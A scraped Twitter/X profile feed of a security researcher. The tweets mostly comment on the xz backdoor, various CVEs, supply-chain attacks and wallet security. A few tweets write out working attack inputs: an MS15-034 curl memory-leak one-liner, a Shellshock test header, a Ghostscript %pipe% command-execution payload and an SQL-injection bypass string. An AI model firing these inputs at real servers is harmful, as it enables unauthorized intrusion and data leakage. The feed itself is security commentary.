Juliano Rizzo

@julianor

Followers: 9,638 · Following: 1,947 · Media: 396 · Statuses: 15,333

Crypto. Security.

Metaverse
Joined October 2008
@julianor
Juliano Rizzo
1 month
Jia Tan's git commit to turn off Landlock sandboxing one week after Lasse Collin improved it. I understand the sandbox is for xz, the command line tool, and Jia did not need to disable it for the SSHD backdoor. 🤔The xz command also activates the backdoor?
@julianor
Juliano Rizzo
3 years
CVE-2020-27020 "every instance of Kaspersky Password Manager in the world will generate the exact same password at a given second" Reported 2 years ago "June 15, 2019: report and proof of concept sent to through HackerOne."
@julianor
Juliano Rizzo
1 month
xz/lzma backdoor: 🔬 Discovered and analyzed by Andres Freund while investigating performance issues 🔎 GitHub "JiaT75" contributions now being audited 🐧Affected distros: Debian sid, Fedora 41/Rawhide, Arch Linux (5.6.1-1), NixOS unstable ☠️ Narrowly avoided wider impact
@julianor
Juliano Rizzo
1 month
The xz/liblzma CVE-2024-3094 backdoor is a door with a key: 🕵️Obfuscated code hidden in test data files 🎯Injects code during Debian or RPM package build process 🔐Redirects crypto functions used during SSH logins 👻 Tries to evade analysis & debugging 🔎Detected by Andres Freund
@julianor
Juliano Rizzo
1 month
Jia Tan's XZ attack was steps away from owning millions of devices. Buildroot uses & recommends XZ for images & upstream package code. Switching the XZ_SITE var to the "xz." subdomain in this config could've been enough, but in this patch it is accepted only for documentation.
@julianor
Juliano Rizzo
1 month
Reverse engineering by @amlweems reveals 3 flaws that allow attackers to use the backdoor without the private key, using only a captured message signed for the target host: 1. Lack of replay protection 2. Symmetric encryption with a hardcoded key 3. Partially signed commands
@amlweems
Anthony Weems
1 month
I've been reverse engineering the xz backdoor this weekend and have documented the payload format and written a proof-of-concept exploit for the RCE. The payloads are signed with an ED448 key, so I patched my own key into the backdoor for testing. :-)
@julianor
Juliano Rizzo
3 years
infosec Twitter excited about yet another Linux priv escalation bug 🥱(who cares, unix priv separation 50 years of fail) but no comments about the WhatsApp RCE without any boomer memory corruption technique being used? Thread
@julianor
Juliano Rizzo
1 month
The xz/liblzma CVE-2024-3094 backdoor is a door with a key: 🕵️Obfuscated code hidden in test data files 🎯Injects code during Debian or RPM package build process 🔐Redirects crypto functions used during SSH logins 👻 Tries to evade analysis & debugging 🔎Detected by Andres Freund
@julianor
Juliano Rizzo
3 years
"The impact is that each byte in the RNG seed has a 97% chance of being 0 due to incorrect conversion. When it is not, the bytes are 0 through 9."
@GHSecurityLab
GitHub Security Lab
3 years
GHSL-2021-1012: Poor random number generation in keypair - CVE-2021-41117 -
@julianor
Juliano Rizzo
2 years
us-east-1 down, web3 revolution suspended
@julianor
Juliano Rizzo
4 years
The end is near. 2020 does not forgive. "15 years later: Remote Code Execution in qmail (CVE-2005-1513)"
@julianor
Juliano Rizzo
10 months
CVE-2023-38408: Remote Code Execution in OpenSSH's forwarded ssh-agent
@julianor
Juliano Rizzo
10 months
🔥CVE-2023-38408: "Surprisingly, by chaining 4 common side effects of shared libs from official distribution packages, we were able to transform this very limited primitive (dlopen and dlclose of shared libraries from /usr/lib*) into a reliable, one-shot remote code execution"
@julianor
Juliano Rizzo
7 years
Internet threat level: MEDIUM
@julianor
Juliano Rizzo
2 years
Tried to investigate the Solana wallet key theft issue but are all the wallets closed source? Seriously?
@julianor
Juliano Rizzo
6 years
The barrier to remote code execution in a *secure* chat app is this regex that looks like x86 shellcode? 😕const URL_REGEX = /(^|[\s\n]|<br\/?>)((?:https?|ftp):\/\/[-A-Z0-9\u00A0-\uD7FF\uE000-\uFDCF\uFDF0-\uFFFD+\u0026\u2019@#/%?=()~_|!:,.;]*[-A-Z0-9+\u0026@#/%=~()_|])/gi;
@julianor
Juliano Rizzo
10 years
"100% reliable and portable exploit for MobileSafari on IOS7.1.x. can be downloaded from github" CVE-2014-4377 #ios8 http://t.co/dGWm5V7h4L
@julianor
Juliano Rizzo
2 years
The Volkswagen attack but for apps! "For example, an app could determine whether it was in Apple's review process, changing its UI so as not to fall foul of any App Store guidelines before unleashing popups asking for money on unsuspecting users."
@keleftheriou
Kosta Eleftheriou
2 years
👀 “An investigation into seven different apps on the Mac App Store, including the number one PDF reader in the U.S., has found that all of them are orchestrated by the same Chinese developer using fake reviews and command-and-control exploits to try and target users.”
@julianor
Juliano Rizzo
5 years
"Radiofrequency radiation exposure from the iPhone 7 — one of the most popular smartphones ever sold — measured over the legal safety limit and more than double what Apple reported to federal regulators from its own testing" 🍎📱☠️
@julianor
Juliano Rizzo
14 days
"how I hacked Google": dependency confusion
@julianor
Juliano Rizzo
8 years
it took courage
@julianor
Juliano Rizzo
1 month
🤔🤥 The analysis Andres Freund did was without reading the source code, observing the system using tools like perf and gdb that do not require source code. 🗨️From his email: "most of what I observed is purely from observation."
@esrtweet
Eric S. Raymond
1 month
2/ Open source worked the way it's supposed to. Some hacker noticed something that made him curious, poked at it because hackers are like that, and because the code was open and available for inspection, diagnosed the problem before any serious harm was done.
@julianor
Juliano Rizzo
10 years
SSL/TLS Triple Handshake Attack Demo client cert authentication broken. Web exploit. http://t.co/OHxx0u9XCi
@julianor
Juliano Rizzo
5 years
🤦‍♂️😳😥 Programmer was spied on, raided, computer devices taken to examine personal files. Reasons provided by the police "investigation" about an email leak? Tweets about Java, Python, nginx, electronic voting systems, and being critical of the security of gov systems. Argentina.
@mis2centavos
Javier Smaldone
5 years
And speaking of technical matters, it seems the @PFAOficial even made a diagram of my supposed skills. (To be clear: I don't program in Java, not even if they cut off my arm.)
@julianor
Juliano Rizzo
6 years
⚠️ don't use java.util.Random to generate cryptocurrency private keys.
@julianor
Juliano Rizzo
1 month
Jared Allard's (1Password employee) GitHub account made a PR to update a dependency to the backdoored version:
@julianor
Juliano Rizzo
1 month
xz/lzma backdoor: 🔬 Discovered and analyzed by Andres Freund while investigating performance issues 🔎 GitHub "JiaT75" contributions now being audited 🐧Affected distros: Debian sid, Fedora 41/Rawhide, Arch Linux (5.6.1-1), NixOS unstable ☠️ Narrowly avoided wider impact
@julianor
Juliano Rizzo
5 years
"With SGX-ROP, we bypass ASLR, stack canaries, and address sanitizer. We demonstrate that instead of protecting users from harm, SGX currently poses a security threat, facilitating so-called super-malware with ready-to-hit exploits"
@julianor
Juliano Rizzo
7 years
Another Jenkins unauthenticated remote code execution serialization exploit. supply chain attacks 😱🚨
@julianor
Juliano Rizzo
3 years
Just as when I cook I can hear the voice of loved ones giving directions I will remember your wise advice when I read or write code @ajlopez ♥️ baby steps, KISS, TDD :)
@julianor
Juliano Rizzo
4 years
not a backdoor! but.. this is how electron apps update ? (found while reviewing something else)
@julianor
Juliano Rizzo
8 years
Use Pen. Use Paper.
@julianor
Juliano Rizzo
10 months
🔥CVE-2023-38408: "Surprisingly, by chaining 4 common side effects of shared libs from official distribution packages, we were able to transform this very limited primitive (dlopen and dlclose of shared libraries from /usr/lib*) into a reliable, one-shot remote code execution"
@julianor
Juliano Rizzo
7 years
Chromecast starts an open WiFi AP if it gets disconnected from your AP, and it has the key of your WiFi network and at least 3 TCP services
@julianor
Juliano Rizzo
3 years
\o WhatsApp stores SSL/TLS secrets and some useful info for attackers in /sdcard. Bad. Attackers can get the secrets from JS code in a HTML attachment and use them to hijack connections between WhatsApp and servers. Bad but ehhh2eeehh encryption ...
@julianor
Juliano Rizzo
27 days
🔎Researchers are working hard but still need to conclude the XZ backdoor analysis and determine whether it has alternative communication channels or triggers. 🎁The xz-min project by @felipec is a way to easily reproduce the XZ backdoor to study it:
@julianor
Juliano Rizzo
4 years
Second public Auth0 JWT critical bug IIRC "JWT Validation Bypass in Auth0 Authentication API" "does not adequately validate a user’s JWT token, allowing an attacker to forge a JWT for any user by creating a JWT with an algorithm of ‘none’ " JWT->🗑️
@julianor
Juliano Rizzo
3 years
I was asked what improved in the last 20 years, I said "at least we don't have RCE in Apache"
@julianor
Juliano Rizzo
8 years
"The code can't be 'hacked.' It can only be used" You don't break software when you exploit it, you just demonstrate that it was broken.
@julianor
Juliano Rizzo
1 year
1/ 🧵Recently, I've come across rumors about security issues at #Cloudflare , and it's really worrisome. High-impact attacks have been reported, somehow abusing their API. I can't believe this has been circulating for so long without any clarification.
@julianor
Juliano Rizzo
3 years
"Unfortunately, it's the same old story. A fairly trivial buffer overflow programming error in C++ code in the kernel parsing untrusted data, exposed to remote attackers."
@julianor
Juliano Rizzo
7 years
By the way, just as we worked for free to illustrate the risk of electronic voting, we would contribute to a serious electoral technology project.
@julianor
Juliano Rizzo
1 month
@adtac_ or just start a reverse shell, all that work for the backdoor and limit communication channel only to exposed SSH services? 🤔
@julianor
Juliano Rizzo
6 years
fork(); 😀👍🏿
@julianor
Juliano Rizzo
3 years
\o/ Detailed post: 👏👏
@julianor
Juliano Rizzo
3 years
The most effective supply chain attack? Stack Overflow
@julianor
Juliano Rizzo
6 years
'or'1'='1 but without quotes.
@Corrupted_brain
Oops!
6 years
Awesome login bypass by @brutelogic
@julianor
Juliano Rizzo
10 years
SSL/TLS Checklist for Pentesters -Manual Configuration Tests Cheatsheet http://t.co/RA7jPFfUL2
@julianor
Juliano Rizzo
5 years
"For ECDSA signatures, the nonce K becomes significantly biased with up to 80 of the 256 bits being static, resulting in weakened signatures. This could allow an attacker who gains access to several signatures to reconstruct the private key."🤔
@Yubico
Yubico | #YubiKey
5 years
Yubico has discovered and fixed an issue with our YubiKey FIPS Series keys, see the following Advisory for technical details and information on how to obtain a free replacement device. No other YubiKey, Security Key or Yubico products are affected.
@julianor
Juliano Rizzo
1 month
CVE-2024-3094 XZ Utils shell script analysis by @gynvael highlights: 🕵️‍♂️ Multi-stage 🌳 Living off the land techniques (AWK RC4 encryption) 🧩 Extension mechanism for future updates through binary test files 🕵️‍♀️ Simple but effective obfuscation for evasion
@julianor
Juliano Rizzo
7 years
"Unfortunately, OpenPGP has a few spots where SHA-1 is hardwired into the design. For example, key fingerprints cannot be anything else"
@julianor
Juliano Rizzo
7 years
internet security, so fragile.
@julianor
Juliano Rizzo
3 years
Attacks on the software supply chain are "the attack", anything can be hacked this way. Malicious npm packages are one of the easiest. The recently detected attacks are loud - cryptocurrency mining CPU usage or broken builds. The most subtle and targeted not being detected.
@julianor
Juliano Rizzo
3 months
🎻 Spoiler: new post-quantum (🤌) code is packed with bugs that turn your private conversations into an open book for memory corruption exploit artists. 🪄But fear not, you're protected against adversaries wielding imaginary computers.
@matthew_d_green
Matthew Green
3 months
So Apple has gone and updated the iMessage protocol to incorporate both forward security (very good!) and post-quantum cryptography.
@julianor
Juliano Rizzo
2 years
Chip Red Pill:
@julianor
Juliano Rizzo
7 years
"I realized that this bug was first reported to Microsoft in 1997, making it older than I am." 😏
@julianor
Juliano Rizzo
3 years
Exploiting Linux Kernel futex CVE-2021-3347 CVE-2014-3153
@julianor
Juliano Rizzo
9 years
MS15-034 x=$[$(curl -sk $URLFILE -w"%{size_download}" -oo)-1];curl -sk $URLFILE -H"Range: bytes=$x-18446744073709551615" -o dmp;od -x dmp
@julianor
Juliano Rizzo
6 years
infosec job security "Passing a number as the first argument to Buffer() (e.g. new Buffer(10)) allocates a new Buffer object of the specified size. Prior to Node.js 8.0.0, the memory allocated for such Buffer instances is not initialized and can contain sensitive data."
@julianor
Juliano Rizzo
5 years
SIM swapping in Argentina is far too easy. For example, at a carrier's store you ask to switch from a Micro to a Nano SIM and they don't verify identity the way they should. Don't use SMS as a second factor for anything important.
@julianor
Juliano Rizzo
8 years
Google Wave failed but the demo was interesting, exciting, interesting problems solved, ambitious. Recent product demos are so lame.
@julianor
Juliano Rizzo
4 years
If Windows Electron app uses electron-builder autoupdate, it downloads .yml file from url set in package.json. The download temp file name includes a string from the .yml file (url decoded) and is passed to Powershell unescaped. RCE from update server bypassing sig verification.
@julianor
Juliano Rizzo
6 years
"Use Signal," the Twitter security expert said. 2 wormable remote code execution bugs in less than a week.
@HacKanCuBa
💚🧡 𝘏𝘢𝘤𝘒𝘢𝘯
6 years
New variant of our vulnerability found in signal-desktop, already patched in v1.11.0. Here's the write-up w/ messages exfiltration PoC: And the advisory: Found by @IAmMandatory cc @ortegaalfredo @julianor #CVE-2018-11101
@julianor
Juliano Rizzo
10 years
Internal Server Error (500) or empty reply means vulnerable: curl -H"test:() { test; }; /usr/bin/yes" server CVE-2014-6271:
@julianor
Juliano Rizzo
10 years
impressive exploit for nginx<=1.4.0 CVE-2013-2028 by sorbo http://t.co/8qWNYF2T1z 64bit,finds canary byte by byte,blind rop, tcp frag,8-o ..
@julianor
Juliano Rizzo
7 years
#BoletaUnicaPapelYa Don't put computers where they aren't needed. We still can't even get them to do only what their owner wants.
@julianor
Juliano Rizzo
1 year
@dystopiabreaker I suspect it is hallucinated but it should be easy to trigger it with a fame moon if that is the case
@julianor
Juliano Rizzo
5 years
The agile scam: it solves everything if 'properly implemented'
@perrymetzger
Perry E. Metzger
5 years
This is a misconception. Properly implemented, agile methods dramatically reduce security risk. See my direct replies for more, but the summary is, policies are best implemented as software, not as documents everyone ignores.
@julianor
Juliano Rizzo
3 years
Ethereum geth bug exploited using STATICCALL
@julianor
Juliano Rizzo
10 years
"I was an idiot and assumed that the 'random' button on http://t.co/5BG14kGfwU was truly random" $20k life lesson http://t.co/Q4nU2XSWMI
@julianor
Juliano Rizzo
6 years
Every React project using "dangerouslySetInnerHTML" I have reviewed was exploitable. Yes! "dangerously" is the name Yes! devs use it anyway for security apps (encrypted chat, wallets) commit "Move to react for newlines, emoji, and links in message body"
@julianor
Juliano Rizzo
7 years
A computational algebra system in Smalltalk by a bored hacker
@julianor
Juliano Rizzo
10 years
EASTER attack: Even More Critical Bugs in SSL/TLS impl.(Java) http://t.co/DXOifYTIjX "only about 73710 queries in mean for a 4096 RSA"
@julianor
Juliano Rizzo
7 years
Current Internet threat level after #ShadowBrokers dump + Linux UDP RCE #internetthreatlevel HIGH RISK
@julianor
Juliano Rizzo
5 years
"it is astounding that no one who wrote the MCAS software for the 737 Max seems even to have raised the possibility of using multiple inputs, including the opposite angle-of-attack sensor, in the computer’s determination of an impending stall. .."
@julianor
Juliano Rizzo
9 years
don't be surprised if SSRF + will be used in a few remote root exploits next year. + cool crypto bug? perhaps
@julianor
Juliano Rizzo
7 years
Exploiting Android S-Boot 👍Read it if you want to know how Android boots and can be attacked from USB
@julianor
Juliano Rizzo
6 years
the most gorgeous cryptocurrency p2p network stats web app just unveiled by @RSKsmart 😍👍🏿
@julianor
Juliano Rizzo
9 years
reprogram 4G modems via SMS, make them act as keyboard -> reboot -> act as storage -> install bootkit. 8-o http://t.co/mcnj0WOLHU
@julianor
Juliano Rizzo
3 years
😱
@julianor
Juliano Rizzo
10 months
RIP Condor. When I was ~11 years old I collected newspaper clippings about hacking (no Internet yet 👴) and many were about his story (at least a version of it). Around 2002 he emailed me asking for a sendmail exploit (@lcamtuf bug). Treasured mail, printed and saved but lost now.
@WeldPond
Weld Pond | Chris Wysopal
10 months
We've lost a true pioneer of the digital world, Kevin Mitnick. His ingenuity challenged systems, incited dialogues, and pushed boundaries in cybersecurity. He will remain a testament to the uncharted power of curiosity. #RIPKevinMitnick
@julianor
Juliano Rizzo
7 years
Hackers having fun with .ar electronic voting system. Cool demo today at Congress (if gov.ar doesn't find a way to cancel or delay it again)
@mis2centavos2
#NOalVotoElectrónico #BoletaÚnicaPapelYA 🗳
7 years
Look, @mgwechsler. Last night we remembered you.
@julianor
Juliano Rizzo
10 years
Successful private key extraction from OpenVPN (server) using #Heartbleed
@julianor
Juliano Rizzo
6 years
UI to make this process easier would be useful: Guide to using YubiKey as a SmartCard for GPG and SSH @Yubico
@julianor
Juliano Rizzo
11 years
Learn and save the world: The Layman's Guide to IC Reverse Engineering http://t.co/7SS0d1pJra
@julianor
Juliano Rizzo
1 year
1/🧵 It's crucial to understand how Cloudflare Worker-based MITM attacks can impact dApps, web wallets, and other services. Let's dive into the mechanics of these attacks, and what you should know to protect yourself:
@julianor
Juliano Rizzo
9 years
MS15-034 a new Heartbleed? Try: Range: bytes:(filesize-1)-18446744073709551615 I get extra bytes
@julianor
Juliano Rizzo
1 year
Ledger Recover controversy: I asked if after the update the seed leaves the most secure part of the SE: btchip: "Official statements will be available on our twitter account. This firmware update introduces a new API to return the seed shards to the Dashboard, correct" 🧵
@julianor
Juliano Rizzo
8 years
"PWNED": .ar Justice confirms Vot.Ar electronic voting server security was broken and no damage done by bug reporter
@_joac
joac
8 years
Yes, the justice system says so: I did MSA a favor
@julianor
Juliano Rizzo
1 year
If you're developing a crypto wallet app, it's especially important to be cautious about using third-party libraries in production. Telemetry, crash reporting, and other libs can be useful tools for app developers, but they also come with some risks beyond privacy issues. 1/6
@julianor
Juliano Rizzo
7 years
I have no words to describe the genius of @TurroSec ...they made a hacker sticker album
@julianor
Juliano Rizzo
7 years
0day exploit prices: * AV remote, Office/PDF reader: $50k * Chrome: $150k
@julianor
Juliano Rizzo
6 years
😱 %!PS userdict /setpagedevice undef legal { null restore } stopped { pop } if legal mark /OutputFile (%pipe%id) currentdevice putdeviceprops
@julianor
Juliano Rizzo
2 years
For DALLE-E a perfect mate drink has two straws 🤔🧉
@julianor
Juliano Rizzo
5 years
"It is worth noting that even though the project was coded in Rust, the audit team found vulnerabilities that resulted in remote code execution and memory corruption." 🎤
@grincouncil
Grin Council
5 years
Results from Grin's 2nd security audit are now published. A big thanks to @coinspect, j01tz, and all the 💛Grin donors💛 who made this work possible. ツ
@julianor
Juliano Rizzo
10 years
James Iry’s history of programming languages (illustrated with pictures and large fonts) http://t.co/KTzEmgj4SU http://t.co/0Vp11pLawb
@julianor
Juliano Rizzo
4 years
some believed cryptocurrency incentives were going to make p2p networks like Tor better: "They replaced bitcoin addresses in HTTP traffic to redirect transactions to their wallets instead of the user provided bitcoin address"
@emax
electronic Max
4 years
wow, an attacker recently controlled up to 24% the exit relay capacity of the tor network, seemingly all for a cryptocurrency scam. this is crazy >
@julianor
Juliano Rizzo
12 years
CRIME attack slides comments enabled and welcome #ekoparty2012
@julianor
Juliano Rizzo
3 years
../ To make these RCE chains easier WhatsApp stores native libraries in /data/data/com.whatsapp/files/decompressed/libs.spk.zst 🤷‍♂️attackers can use the .zip bug to overwrite any of them (I would go for the Rust ones) and execute arbitrary code.